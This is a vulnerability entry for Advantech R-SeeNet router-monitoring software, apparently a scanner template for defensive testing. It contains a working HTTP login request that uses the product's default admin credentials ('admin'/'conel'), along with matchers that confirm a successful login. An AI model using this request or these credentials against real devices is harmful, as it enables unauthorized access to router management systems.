漏洞描述
Advantech R-SeeNet default admin credentials were discovered. R-SeeNet is a software system used for monitoring of status and functions of Advantech routers.
rseenet-default-login: Advantech R-SeeNet Default Login
PoC代码[已公开]
id: rseenet-default-login
info:
name: Advantech R-SeeNet Default Login
author: princechaddha
severity: high
description: Advantech R-SeeNet default admin credentials were discovered. R-SeeNet is a software system used for monitoring of status and functions of Advantech routers.
reference:
- https://icr.advantech.cz/products/software/r-seenet
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: rseenet,default-login,vuln
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=login_change&oper=0&username={{user}}&password={{pass}}&submit=Login
attack: pitchfork
payloads:
user:
- admin
pass:
- conel
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<title>R-SeeNet (.*)</title>'
- type: word
part: body
words:
- "User is succesfully logged."
# digest: 4a0a00473045022100ce2cb88f1f032317dbea8d243c886def620f2282c7da4058f7b24a3e50f59da002204c87c0f4541d2384b991df164503f274c2a6212034f7ee4e6180d159bf9f26ca:922c64590222798bb761d5b6d8e72950